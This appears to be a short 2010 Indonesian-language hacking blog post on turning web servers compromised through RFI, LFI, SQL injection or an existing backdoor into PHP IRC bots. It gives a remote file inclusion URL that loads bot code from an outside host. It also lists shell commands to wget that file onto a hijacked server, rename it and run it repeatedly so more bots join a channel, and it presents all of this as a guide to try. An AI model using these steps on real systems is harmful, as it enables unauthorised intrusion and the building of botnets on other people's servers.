Kamis, 11 Maret 2010

Bikin Bot Php mIRC di Shell Inject

Biasanya Kebanyakan kalo lagi Scanning target baik menggunakan RFI.LFI,dan SQL Injection ada saja target Safemode on. Target inject ini bisa dimanfaatkan dengan menggunakan Bot Php. Caranya simple saja cukup edit source codenya yang berhubungan dengan admin, pass admin,IRC server,Channel. seperti:
1. misalnya ada target safe mode on http://site.com/index.php?page=[yourlinkevilcode/evilcode?]
2. Kita rubah link evilcode menjadi Link bot phpnya
exp : http://site.com/index.php?page=http://wondercar.ru/setlinks_78909/admin/fvck2010.txt?

enter terus di browser engine kamu sesuai dengan berapa jumlah bot yang kamu inginkan

3.Jika Kita tidak tahu vurneable path dari shell inject tersebut dikarenakan tidak tahu apa bugnya dan hanya mendapatkan backdoor dari shell inject itu bisa dilakukan dengan cara:

- login di shell inject tersebut menggunakan backdoor tersebut
exp: http://shell-inject.com/backdoor.php

- Wget atau Upload file botphp tersebut bagaimanapun caranya yang penting file bot phpnya berada didalam shell exp: wget http://wondercar.ru/setlinks_78909/admin/fvck2010.txt

-rename filenya : mv fvck2010.txt terserah.php

- running dengan command : php terserah.php (semakin banyak kamu mengetik "php terserah.php" dan enter maka semakin banyak pula botnya join di channel)

-atau dengan command http://shell-inject.com/terserah.php? (semakin banyak meng-enter link diatas di browser engine semakin banyak pula bot yang join di channel). selamat mencoba

ref: dari berbagai sumber

0 komentar:

Posting Komentar